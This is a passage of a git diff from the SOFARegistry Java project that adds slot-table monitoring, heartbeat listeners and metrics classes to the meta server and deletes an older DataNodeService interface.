String.valueOf(slotId)).set(1); + } catch (Throwable throwable) { + LOGGER.error("[setDataServerSlotLagTimes]", throwable); + } + } + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/SlotStats.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/SlotStats.java new file mode 100644 index 000000000..8d92d8801 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/SlotStats.java @@ -0,0 +1,40 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.monitor; + +import com.alipay.sofa.registry.common.model.slot.FollowerSlotStatus; +import com.alipay.sofa.registry.common.model.slot.LeaderSlotStatus; +import com.alipay.sofa.registry.common.model.slot.Slot; + +/** + * @author chen.zhu + *

Jan 28, 2021 + */ +public interface SlotStats { + + Slot getSlot(); + + boolean isLeaderStable(); + + boolean isFollowersStable(); + + boolean isFollowerStable(String dataServer); + + void updateLeaderState(LeaderSlotStatus leaderSlotStatus); + + void updateFollowerState(FollowerSlotStatus followerSlotStatus); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/SlotTableMonitor.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/SlotTableMonitor.java new file mode 100644 index 000000000..f63d8c57f --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/SlotTableMonitor.java @@ -0,0 +1,31 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.monitor; + +import com.alipay.sofa.registry.observer.UnblockingObserver; +import com.alipay.sofa.registry.server.meta.monitor.data.DataMessageListener; + +/** + * @author chen.zhu + *

Dec 25, 2020 + */ +public interface SlotTableMonitor extends DataMessageListener, UnblockingObserver { + + void recordSlotTable(); + + boolean isStableTableStable(); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/SlotTableStats.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/SlotTableStats.java new file mode 100644 index 000000000..30a39f9cb --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/SlotTableStats.java @@ -0,0 +1,38 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.monitor; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.BaseSlotStatus; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.lifecycle.Initializable; +import java.util.List; + +/** + * @author chen.zhu + *

Jan 28, 2021 + */ +public interface SlotTableStats extends Initializable { + + boolean isSlotLeadersStable(); + + boolean isSlotFollowersStable(); + + void updateSlotTable(SlotTable slotTable); + + void checkSlotStatuses(DataNode node, List slotStatuses); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/data/DataMessageListener.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/data/DataMessageListener.java new file mode 100644 index 000000000..32339f2d1 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/data/DataMessageListener.java @@ -0,0 +1,26 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.monitor.data; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.server.meta.monitor.heartbeat.HeartbeatListener; + +/** + * @author chen.zhu + *

Feb 23, 2021 + */ +public interface DataMessageListener extends HeartbeatListener {} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/data/DataServerStats.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/data/DataServerStats.java new file mode 100644 index 000000000..ca865e307 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/data/DataServerStats.java @@ -0,0 +1,85 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.monitor.data; + +import com.alipay.sofa.registry.common.model.slot.BaseSlotStatus; +import java.util.List; + +/** + * @author chen.zhu + *

Feb 24, 2021 + */ +public class DataServerStats { + + private final String dataServer; + private final long slotTableEpoch; + private final List slotStatuses; + + /** + * Constructor. + * + * @param dataServer + * @param slotTableEpoch the slot table epoch + * @param slotStatuses the slot status + */ + public DataServerStats( + String dataServer, long slotTableEpoch, List slotStatuses) { + this.dataServer = dataServer; + this.slotTableEpoch = slotTableEpoch; + this.slotStatuses = slotStatuses; + } + + /** + * Gets get slot table epoch. + * + * @return the get slot table epoch + */ + public long getSlotTableEpoch() { + return slotTableEpoch; + } + + /** + * Gets get slot status. + * + * @return the get slot status + */ + public List getSlotStatus() { + return slotStatuses; + } + + /** + * Gets get data server. + * + * @return the get data server + */ + public String getDataServer() { + return dataServer; + } + + @Override + public String toString() { + return "DataServerStats{" + + "dataServer='" + + dataServer + + '\'' + + ", slotTableEpoch=" + + slotTableEpoch + + ", slotStatuses=" + + slotStatuses + + '}'; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/data/DataSlotMetricsRecorder.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/data/DataSlotMetricsRecorder.java new file mode 100644 index 000000000..e45af0725 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/data/DataSlotMetricsRecorder.java @@ -0,0 +1,41 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.monitor.data; + +import com.alipay.sofa.registry.common.model.slot.DataNodeSlot; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.server.meta.monitor.Metrics; +import com.alipay.sofa.registry.server.shared.slot.SlotTableRecorder; +import java.util.List; + +/** + * @author chen.zhu + *

Mar 03, 2021 + */ +public class DataSlotMetricsRecorder implements SlotTableRecorder { + @Override + public void record(SlotTable slotTable) { + List dataNodeSlots = slotTable.transfer(null, false); + dataNodeSlots.forEach( + dataNodeSlot -> { + Metrics.DataSlot.setLeaderNumbers( + dataNodeSlot.getDataNode(), dataNodeSlot.getLeaders().size()); + Metrics.DataSlot.setFollowerNumbers( + dataNodeSlot.getDataNode(), dataNodeSlot.getFollowers().size()); + }); + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/heartbeat/HeartbeatListener.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/heartbeat/HeartbeatListener.java new file mode 100644 index 000000000..2ae8ec088 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/heartbeat/HeartbeatListener.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.monitor.heartbeat; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.HeartbeatRequest; + +/** + * @author chen.zhu + *

Feb 24, 2021 + */ +public interface HeartbeatListener { + void onHeartbeat(HeartbeatRequest heartbeat); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/impl/DefaultSlotStats.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/impl/DefaultSlotStats.java new file mode 100644 index 000000000..03fcb1a07 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/impl/DefaultSlotStats.java @@ -0,0 +1,173 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.monitor.impl; + +import com.alipay.sofa.registry.common.model.slot.BaseSlotStatus; +import com.alipay.sofa.registry.common.model.slot.FollowerSlotStatus; +import com.alipay.sofa.registry.common.model.slot.LeaderSlotStatus; +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.server.meta.monitor.SlotStats; +import com.google.common.collect.Maps; +import java.util.Map; +import java.util.Objects; +import org.apache.commons.lang.StringUtils; + +/** + * @author chen.zhu + *

Jan 28, 2021 + */ +public class DefaultSlotStats implements SlotStats { + + private final Slot slot; + private final long maxSyncGap; + + private volatile BaseSlotStatus.LeaderStatus leaderStatus = BaseSlotStatus.LeaderStatus.INIT; + + /** + * offsets: follower replicate offset against the leader. Current implementation is as simple as + * no incremental data replication Under this circumstances, offset stands for the last successful + * sync task execute time + */ + private final Map followerLastSyncTimes = Maps.newConcurrentMap(); + + /** + * Constructor. + * + * @param slot the slot + */ + public DefaultSlotStats(Slot slot, long maxSyncGap) { + this.slot = slot; + this.maxSyncGap = maxSyncGap; + } + + /** + * Gets get slot. + * + * @return the get slot + */ + @Override + public Slot getSlot() { + return slot; + } + + /** + * Is leader stable boolean. + * + * @return the boolean + */ + @Override + public boolean isLeaderStable() { + return leaderStatus.isHealthy(); + } + + /** + * Is followers stable boolean. + * + * @return the boolean + */ + @Override + public boolean isFollowersStable() { + for (String dataServer : slot.getFollowers()) { + if (!isFollowerStable(dataServer)) { + return false; + } + } + return true; + } + + /** + * Is follower stable boolean. + * + * @param dataServer the data server + *

Calculate the replicate gap between leader and followers, check if it's legal Current + * implementation is as simple as no incremental data replication Under this circumstances, + * offset stands for the last successful sync task execute time + * @return the boolean + */ + @Override + public boolean isFollowerStable(String dataServer) { + if (StringUtils.isEmpty(dataServer)) { + return false; + } + Long offset = followerLastSyncTimes.get(dataServer); + return offset != null && System.currentTimeMillis() - offset < maxSyncGap; + } + + /** + * Update leader state. + * + * @param leaderSlotStatus the leader slot status + */ + @Override + public void updateLeaderState(LeaderSlotStatus leaderSlotStatus) { + this.leaderStatus = leaderSlotStatus.getLeaderStatus(); + } + + /** + * Update follower state. + * + * @param followerSlotStatus the follower slot status + */ + @Override + public void updateFollowerState(FollowerSlotStatus followerSlotStatus) { + followerLastSyncTimes.put( + followerSlotStatus.getServer(), followerSlotStatus.getLastLeaderSyncTime()); + } + + /** + * To string string. + * + * @return the string + */ + @Override + public String toString() { + return "DefaultSlotStats{" + + "slot=" + + slot + + ", leaderStatus=" + + leaderStatus + + ", followerOffsets=" + + followerLastSyncTimes + + '}'; + } + + /** + * Equals boolean. + * + * @param o the o + * @return the boolean + */ + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (o == null || getClass() != o.getClass()) return false; + DefaultSlotStats that = (DefaultSlotStats) o; + return Objects.equals(slot, that.slot) + && leaderStatus == that.leaderStatus + && Objects.equals(followerLastSyncTimes, that.followerLastSyncTimes); + } + + /** + * Hash code int. + * + * @return the int + */ + @Override + public int hashCode() { + return Objects.hash(slot, leaderStatus, followerLastSyncTimes); + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/impl/DefaultSlotTableMonitor.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/impl/DefaultSlotTableMonitor.java new file mode 100644 index 000000000..3a1e12417 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/impl/DefaultSlotTableMonitor.java @@ -0,0 +1,184 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.monitor.impl; + +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.HeartbeatRequest; +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.exception.InitializeException; +import com.alipay.sofa.registry.exception.StartException; +import com.alipay.sofa.registry.exception.StopException; +import com.alipay.sofa.registry.lifecycle.impl.AbstractLifecycle; +import com.alipay.sofa.registry.lifecycle.impl.LifecycleHelper; +import com.alipay.sofa.registry.observer.Observable; +import com.alipay.sofa.registry.observer.UnblockingObserver; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.alipay.sofa.registry.server.meta.monitor.Metrics; +import com.alipay.sofa.registry.server.meta.monitor.SlotTableMonitor; +import com.alipay.sofa.registry.server.meta.monitor.SlotTableStats; +import com.alipay.sofa.registry.server.meta.monitor.data.DataSlotMetricsRecorder; +import com.alipay.sofa.registry.server.meta.slot.SlotManager; +import com.alipay.sofa.registry.server.shared.resource.SlotGenericResource; +import com.alipay.sofa.registry.server.shared.slot.DiskSlotTableRecorder; +import com.alipay.sofa.registry.server.shared.slot.SlotTableRecorder; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.WakeUpLoopRunnable; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import java.util.List; +import java.util.Map; +import javax.annotation.PostConstruct; +import javax.annotation.PreDestroy; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.stereotype.Component; + +/** + * @author chen.zhu + *

Dec 25, 2020 + */ +@Component +public class DefaultSlotTableMonitor extends AbstractLifecycle + implements SlotTableMonitor, UnblockingObserver { + + @Autowired private SlotManager slotManager; + + @Autowired private SlotGenericResource slotGenericResource; + + @Autowired private MetaServerConfig metaServerConfig; + + private final Map dataServerLagCounter = Maps.newConcurrentMap(); + + private SlotTableStats slotTableStats; + + private List recorders; + + private WakeUpLoopRunnable scheduledTask; + + @PostConstruct + public void postConstruct() throws Exception { + LifecycleHelper.initializeIfPossible(this); + LifecycleHelper.startIfPossible(this); + } + + @PreDestroy + public void preDestroy() throws Exception { + LifecycleHelper.stopIfPossible(this); + LifecycleHelper.disposeIfPossible(this); + } + + @Override + protected void doInitialize() throws InitializeException { + super.doInitialize(); + recorders = + Lists.newArrayList( + new DiskSlotTableRecorder(), slotGenericResource, new DataSlotMetricsRecorder()); + slotTableStats = new DefaultSlotTableStats(slotManager, metaServerConfig); + slotTableStats.initialize(); + scheduledTask = + new WakeUpLoopRunnable() { + @Override + public int getWaitingMillis() { + return 10 * 60 * 1000; + } + + @Override + public void runUnthrowable() { + recordSlotTable(); + } + }; + } + + @Override + protected void doStart() throws StartException { + super.doStart(); + slotManager.addObserver(this); + ConcurrentUtils.createDaemonThread(DefaultSlotTableMonitor.class.getSimpleName(), scheduledTask) + .start(); + } + + @Override + protected void doStop() throws StopException { + slotManager.removeObserver(this); + if (scheduledTask != null) { + scheduledTask.close(); + } + super.doStop(); + } + + @Override + public void recordSlotTable() { + recorders.forEach( + recorder -> { + if (recorder != null) { + recorder.record(slotManager.getSlotTable()); + } + }); + } + + @Override + public boolean isStableTableStable() { + return slotTableStats.isSlotLeadersStable() && slotTableStats.isSlotFollowersStable(); + } + + @Override + public void update(Observable source, Object message) { + if (message instanceof SlotTable) { + logger.warn( + "[update] slot-table changed, current epoch: [{}]", ((SlotTable) message).getEpoch()); + recordSlotTable(); + slotTableStats.updateSlotTable((SlotTable) message); + } + } + + @VisibleForTesting + public DefaultSlotTableMonitor setSlotManager(SlotManager slotManager) { + this.slotManager = slotManager; + return this; + } + + @VisibleForTesting + public DefaultSlotTableMonitor setMetaServerConfig(MetaServerConfig metaServerConfig) { + this.metaServerConfig = metaServerConfig; + return this; + } + + @Override + public void onHeartbeat(HeartbeatRequest heartbeat) { + long slotTableEpoch = heartbeat.getSlotTableEpoch(); + if (slotTableEpoch < slotManager.getSlotTable().getEpoch()) { + // after slot-table changed, first time data-server report heartbeat, the epoch is less than + // meta servers + // it is ok with that + // but the second time should be ok, otherwise, data has something un-common + int times = dataServerLagCounter.getOrDefault(heartbeat.getNode().getIp(), 0) + 1; + if (times > 1) { + logger.error("[onHeartbeatLag] data[{}] lag", heartbeat.getNode().getIp()); + } + Metrics.DataSlot.setDataServerSlotLagTimes(heartbeat.getNode().getIp(), times); + dataServerLagCounter.put(heartbeat.getNode().getIp(), times); + return; + } + if (heartbeat.getSlotStatus() == null) { + logger.warn("[onHeartbeatEmpty] empty heartbeat"); + return; + } + dataServerLagCounter.put(heartbeat.getNode().getIp(), 0); + Metrics.DataSlot.setDataServerSlotLagTimes(heartbeat.getNode().getIp(), 0); + slotTableStats.checkSlotStatuses(heartbeat.getNode(), heartbeat.getSlotStatus()); + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/impl/DefaultSlotTableStats.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/impl/DefaultSlotTableStats.java new file mode 100644 index 000000000..b403b9d55 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/impl/DefaultSlotTableStats.java @@ -0,0 +1,204 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.monitor.impl; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.*; +import com.alipay.sofa.registry.exception.InitializeException; +import com.alipay.sofa.registry.lifecycle.impl.AbstractLifecycle; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.alipay.sofa.registry.server.meta.monitor.Metrics; +import com.alipay.sofa.registry.server.meta.monitor.SlotStats; +import com.alipay.sofa.registry.server.meta.monitor.SlotTableStats; +import com.alipay.sofa.registry.server.meta.slot.SlotManager; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.Maps; +import java.util.Collections; +import java.util.List; +import java.util.Map; +import java.util.Set; +import java.util.concurrent.locks.ReadWriteLock; +import java.util.concurrent.locks.ReentrantReadWriteLock; + +/** + * @author chen.zhu + *

Jan 28, 2021 + */ +public class DefaultSlotTableStats extends AbstractLifecycle implements SlotTableStats { + + private final SlotManager slotManager; + + private final Map slotStatses = Maps.newConcurrentMap(); + + private final ReadWriteLock lock = new ReentrantReadWriteLock(); + + private final MetaServerConfig metaServerConfig; + + public DefaultSlotTableStats(SlotManager slotManager, MetaServerConfig metaServerConfig) { + this.slotManager = slotManager; + this.metaServerConfig = metaServerConfig; + } + + @Override + protected void doInitialize() throws InitializeException { + super.doInitialize(); + for (int slotId = 0; slotId < SlotConfig.SLOT_NUM; slotId++) { + Slot slot = slotManager.getSlotTable().getSlot(slotId); + if (slot == null) { + slot = new Slot(slotId, null, 0L, Collections.emptyList()); + } + slotStatses.put( + slotId, new DefaultSlotStats(slot, metaServerConfig.getDataReplicateMaxGapMillis())); + } + } + + @Override + public boolean isSlotLeadersStable() { + try { + lock.readLock().lock(); + for (int slotId = 0; slotId < SlotConfig.SLOT_NUM; slotId++) { + String leader = slotManager.getSlotTable().getSlot(slotId).getLeader(); + SlotStats slotStats = slotStatses.get(slotId); + if (!slotStats.getSlot().getLeader().equals(leader) + || !slotStatses.get(slotId).isLeaderStable()) { + logger.warn("[isSlotLeadersStable]slot[{}] leader[{}] not stable", slotId, leader); + return false; + } + } + return true; + } finally { + lock.readLock().unlock(); + } + } + + @Override + public boolean isSlotFollowersStable() { + try { + lock.readLock().lock(); + for (Map.Entry entry : slotStatses.entrySet()) { + Set followers = slotManager.getSlotTable().getSlot(entry.getKey()).getFollowers(); + for (String follower : followers) { + if (!entry.getValue().isFollowerStable(follower)) { + logger.warn( + "[isSlotFollowersStable]slot[{}] follower not stable {}", + entry.getKey(), + entry.getValue()); + return false; + } + } + } + return true; + } finally { + lock.readLock().unlock(); + } + } + + @Override + public void checkSlotStatuses(DataNode node, List slotStatuses) { + try { + lock.writeLock().lock(); + for (BaseSlotStatus slotStatus : slotStatuses) { + int slotId = slotStatus.getSlotId(); + SlotStats slotStats = slotStatses.get(slotId); + if (slotStats == null || slotStats.getSlot() == null) { + continue; + } + if (slotStats.getSlot().getLeaderEpoch() > slotStatus.getSlotLeaderEpoch()) { + logger.warn( + "[checkSlotStatuses] won't update slot status, slot[{}] leader-epoch[{}] is less than current[{}]", + slotId, + slotStatus.getSlotLeaderEpoch(), + slotStats.getSlot().getLeaderEpoch()); + continue; + } else if (slotStats.getSlot().getLeaderEpoch() < slotStatus.getSlotLeaderEpoch()) { + Metrics.DataSlot.setDataSlotGreaterThanMeta(node.getIp(), slotId); + logger.error( + "[checkSlotStatuses] won't update slot status, slot[{}] leader-epoch[{}] reported by data({}) is more than current[{}]", + slotId, + slotStatus.getSlotLeaderEpoch(), + node.getIp(), + slotStats.getSlot().getLeaderEpoch()); + continue; + } + if (!slotStats.getSlot().equals(slotManager.getSlotTable().getSlot(slotId))) { + logger.error( + "[checkSlotStatuses] slot reported by data({}) is not equals with mine({}), not update", + slotStats.getSlot(), + slotManager.getSlotTable().getSlot(slotId)); + continue; + } + + if (slotStatus.getRole() == Slot.Role.Leader) { + if (!slotStats.getSlot().getLeader().equals(node.getIp())) { + logger.error( + "[checkSlotStatuses] slot leader({}) is not equal with reported data-server({})", + slotStats.getSlot().getLeader(), + node.getIp()); + Metrics.DataSlot.setDataReportNotStable(node.getIp(), slotId); + continue; + } + slotStats.updateLeaderState((LeaderSlotStatus) slotStatus); + } else { + if (!slotStats.getSlot().getFollowers().contains(node.getIp())) { + logger.error( + "[checkSlotStatuses] slot follower({}) is not containing reported data-server({})", + slotStats.getSlot().getFollowers(), + node.getIp()); + Metrics.DataSlot.setDataReportNotStable(node.getIp(), slotId); + continue; + } + slotStats.updateFollowerState((FollowerSlotStatus) slotStatus); + } + } + } finally { + lock.writeLock().unlock(); + } + } + + @Override + public void updateSlotTable(SlotTable slotTable) { + try { + lock.writeLock().lock(); + logger.info("[updateSlotTable] update slot table for epoch [{}]", slotTable.getEpoch()); + slotTable + .getSlotMap() + .forEach( + (slotId, slot) -> { + SlotStats slotStats = slotStatses.get(slotId); + if (slotStats.getSlot().getLeaderEpoch() < slot.getLeaderEpoch()) { + slotStatses.put( + slotId, + new DefaultSlotStats(slot, metaServerConfig.getDataReplicateMaxGapMillis())); + } else if (slotStats.getSlot().getLeaderEpoch() == slot.getLeaderEpoch() + && !slotStats.getSlot().equals(slot)) { + slotStatses.put( + slotId, + new DefaultSlotStats(slot, metaServerConfig.getDataReplicateMaxGapMillis())); + } else { + logger.warn("[updateSlotTable]skip slot[{}]", slotId); + } + }); + } finally { + lock.writeLock().unlock(); + } + } + + @VisibleForTesting + public SlotStats getSlotStats(int slotId) { + return slotStatses.get(slotId); + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/session/SessionMessageListener.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/session/SessionMessageListener.java new file mode 100644 index 000000000..3e408a029 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/session/SessionMessageListener.java @@ -0,0 +1,26 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.monitor.session; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.SessionNode; +import com.alipay.sofa.registry.server.meta.monitor.heartbeat.HeartbeatListener; + +/** + * @author chen.zhu + *

Feb 24, 2021 + */ +public interface SessionMessageListener extends HeartbeatListener {} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/DataNodeService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/DataNodeService.java deleted file mode 100644 index 9fc3efccc..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/DataNodeService.java +++ /dev/null @@ -1,36 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.node; - -import com.alipay.sofa.registry.common.model.metaserver.DataNode; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; -import com.alipay.sofa.registry.common.model.metaserver.StatusConfirmRequest; - -import java.util.Map; - -/** - * - * @author shangyu.wh - * @version $Id: DataNodeService.java, v 0.1 2018-01-23 19:09 shangyu.wh Exp $ - */ -public interface DataNodeService extends NodeService { - - void pushDataNodes(NodeChangeResult nodeChangeResult, Map targetNodes, - boolean confirm, String confirmNodeIp); - - void 